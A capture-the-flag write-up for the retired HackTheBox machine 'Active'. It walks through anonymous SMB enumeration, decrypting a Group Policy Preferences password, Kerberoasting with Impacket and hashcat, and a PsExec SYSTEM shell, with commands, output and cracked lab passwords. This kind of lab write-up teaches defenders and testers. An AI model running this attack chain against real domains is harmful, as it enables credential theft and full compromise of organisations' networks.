HackTheBox - Active



OS Difficulty IP Address Status
Windows Easy 10.10.10.100 Retired

This was classified as an easy box by eks and mrb3n on HackTheBox. We gain our foothold by enumerating SMB as it allows anonymous authentication. We find a few shares, one of which includes a username and encoded password. We will decode the password and use it to gain foothold. For the privilege escalation part, we will get the Kerberos ticket (Kerberoast), crack it and escalate to administrator.

Phase 1 - Enumeration

Nmap

We first start off with a Nmap scan to see what ports are opened.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-18 19:15:12Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

At first glance, we can tell right away that it is a Windows machine, running Active Directory with all those default DC ports opened.

SMB

Let’s enumerate SMB on ports (139/445).

smbclient -L \\10.10.10.100
Enter WORKGROUP\kartofel's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available

Trying an anonymous login to list SMB shares was successful, and we can see two shares which looks out of the ordinary: (i) Replication (ii) Users

Now let’s run SMBMap to list the permissions we have with the anonymous login.

smbmap -u '' -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk               Permissions     Comment
        ----               -----------     -------
        ADMIN$             NO ACCESS       Remote Admin
        C$                 NO ACCESS       Default share
        IPC$               NO ACCESS       Remote IPC
        NETLOGON           NO ACCESS       Logon server share 
        Replication        READ ONLY
        SYSVOL             NO ACCESS       Logon server share 
        Users              NO ACCESS

And it looks like we have READ-ONLY access to the Replication share. So, let’s go into Replication and download everything to our machine.

smbclient //10.10.10.100/Replication
Enter WORKGROUP\kartofel's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  active.htb                          D        0  Sat Jul 21 13:37:44 2018

                10459647 blocks of size 4096. 5718262 blocks available
smb: \> cd active.htb\
smb: \active.htb\>  recurse ON  
smb: \active.htb\>  prompt OFF
smb: \active.htb\>  mget *

Going through the downloaded data from Replication share drive, we find a file called ‘Groups.xml’ and it contains the following:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

In the above file, we see the username variable with the value ‘active.htb\SVC_TGS’ and the cpassword variable with a hash as its value.

GPP Passwords

Doing a bit of Googling, we discover the its a Group Policy Preference (GPP) password with Microsoft’s AES encryption. Whenever a new GPP is created, an xml file will also be created in the SYSVOL share.

Phase 2 - Exploitation

Decrypting GPP Password

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Now we have a username and a password, let’s login and get the user flag.

smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18 
Try "help" to get a list of possible commands. 

smb: \> dir
 . DR 0 Sat Jul 21 10:39:20 2018
 .. DR 0 Sat Jul 21 10:39:20 2018 
 Administrator D 0 Mon Jul 16 06:14:21 2018 
 All Users DHS 0 Tue Jul 14 01:06:44 2009 
 Default DHR 0 Tue Jul 14 02:38:21 2009 
 Default User DHS 0 Tue Jul 14 01:06:44 2009 
 desktop.ini AHS 174 Tue Jul 14 00:57:55 2009 
 Public DR 0 Tue Jul 14 00:57:55 2009 
 SVC_TGS D 0 Sat Jul 21 11:16:32 2018 

10459647 blocks of size 4096. 6308502 blocks available

Through SMBClient we can navigate to SVC_TGS\Desktop and read user.txt

Phase 3 - Privilege Escalation

Kerberoasting

Back in 2014, Tim Medin presented an attack on Windows Kerberos protocol for authentication used in Windows Active Directory environments; he called it ‘Kerberoasting.’ We won’t explain why and how it works, but you can visit 0xdf’s post on this machine for better understanding, or watch the official SANS webcast presented by Tim Medin himself, or even just Google around and find out.

But we will go through the steps to Kerberoast.

Step 1: Get the Hash

We will use Impacket’s GetUserSPNs to get the hash.

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

Let’s see the output file.

cat GetUserSPNs.out $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed08...[snip]...

Step 2: Decrypt the Hash

Since we got the hash, let’s decrypt with Hashcat.

hashcat -m 13100 hash.es /usr/share/wordlists/rockyou.txt

And we get a password as ‘Ticketmaster1968’.

Step 3: Get Root!

Let’s use Impacket’s PsExec to login as Adminstrator and get the root flag.

impacket-psexec active.htb/Administrator@10.10.10.100
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies 

Password: 
[*] Requesting shares on 10.10.10.100..... 
[*] Found writable share ADMIN$ 
[*] Uploading file dMCaaHzA.exe 
[*] Opening SVCManager on 10.10.10.100..... 
[*] Creating service aYMa on 10.10.10.100..... 
[*] Starting service aYMa..... 
[!] Press help for extra shell commands 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Windows\system32>whoami 
nt authority\system

And there we have it, rooted!